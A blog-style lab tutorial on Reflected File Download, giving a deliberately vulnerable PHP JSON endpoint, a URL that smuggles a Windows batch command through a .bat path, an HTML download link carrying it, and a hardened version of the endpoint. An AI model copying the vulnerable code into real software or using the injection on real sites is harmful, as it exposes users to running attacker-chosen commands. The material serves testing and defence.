I am sure you have by now heard about Reflected File Download (RFD) [1, 2]. I wanted to set up a server to play around with what this would look like.

First we need a JSON service that reflects user-supplied request data. This was achieved in Kali (assumed here with the IP address: xxx.xxx.xxx.xxx) by creating a file called index.php in the folder /var/www/s/ with the following code:
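<?php
// Simple container for the JSON response
class testdata{
        public $data1 = "";
        public $data2 = "";
        public $data3 = "";
        public $url_search = "";
}
$data_ = new testdata();
$data_->data1 = "foo";
$data_->data2 = "bar";
// Reflect the url_search parameter unchanged (deliberate, this is the test case)
$data_->url_search = isset($_GET['url_search']) ? $_GET['url_search'] : "";
//header("Content-Type: application/json");
// Force a download without naming the file, so the browser takes the name from the URL
header("Content-Disposition: attachment;");
echo json_encode($data_);
?>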
If the code does not run, try making it executable and setting the correct owner:
chmod +x index.php
chown www-data:www-data index.php
Once the web page returns a file, it should be working correctly. Ideally what should be in the file returned is the JSON request. My tests did not manage to make use of the semicolon (;). Apache2 logs kept saying that the file /s; was not found. This means everything after the semicolon was ignored, but it was included in the request, causing problems. I found that just providing the file name after index.php seems to work in Firefox.

Now try injecting the command you desire.
http://xxx.xxx.xxx.xxx/s/index.php/test.bat?url_search=%22||dir%3ew||
This was tested on IE6 in Windows XP SP2, Mac OS X Chrome Version 38.0.2125.111 and Firefox 33.0.2. The above link only worked for Firefox 33.0.2.

As described in the document [2], it is also possible to use a link that downloads the file instead of showing the results in the page. This can be tested with the following saved in a page called index2.php and by commenting out header("Content-Disposition: attachment;"); with // .

<a download="" href="http://xxx.xxx.xxx.xxx/s/index.php/test.bat?url_search=%22||dir%3ew||">hello</a>
This depends heavily on the browser, as each one reacts differently when sending the request. The point of this post is to get everyone trying out the attack vector.
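
A hardened counterpart to the index.php above, as an added example that is not part of the original post: it refuses the extra path segment (/test.bat) that lets the URL choose the download's name, pins the file name in Content-Disposition, and declares the JSON content type. The file name results.json and the 404 response are assumptions chosen for illustration.

```php
<?php
// Added example (not from the original post): hardened form of index.php.

// 1. Exact URL mapping: refuse anything appended after the script name,
//    e.g. /s/index.php/test.bat, so the URL cannot supply a file name.
if (!empty($_SERVER['PATH_INFO'])) {
    http_response_code(404);
    exit;
}

// 2. Read the parameter defensively; a missing or array value becomes "".
$search = isset($_GET['url_search']) && is_string($_GET['url_search'])
    ? $_GET['url_search']
    : '';

$data = array(
    'data1'      => 'foo',
    'data2'      => 'bar',
    'data3'      => '',
    'url_search' => $search,
);

// 3. Declare the real content type and tell the browser not to sniff it.
header('Content-Type: application/json; charset=utf-8');
header('X-Content-Type-Options: nosniff');

// 4. If the response must be a download, fix its name on the server side
//    (results.json is an assumed name) instead of a bare "attachment;".
header('Content-Disposition: attachment; filename="results.json"');

// 5. Emit ", <, >, & and ' as \uXXXX escapes so no raw quote from the
//    reflected value reaches the body. The | character is not changed
//    by these flags, which is why steps 1 and 4 carry the actual fix.
echo json_encode(
    $data,
    JSON_HEX_QUOT | JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS
);
```

With this version, the test URL ending in /index.php/test.bat gets a 404, and a request to /s/index.php?url_search=... is saved as results.json rather than under a name taken from the URL.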

Happy testing!

References:
[1] - Spiderlabs.com - Reflected File Download - A New Web Attack Vector - http://blog.spiderlabs.com/2014/10/reflected-file-download-the-white-paper.html
[2] - White paper "Reflected File Download: A New Web Attack Vector" by Oren Hafif [Hosted on Google Drive] - https://drive.google.com/file/d/0B0KLoHg_gR_XQnV4RVhlNl96MHM/view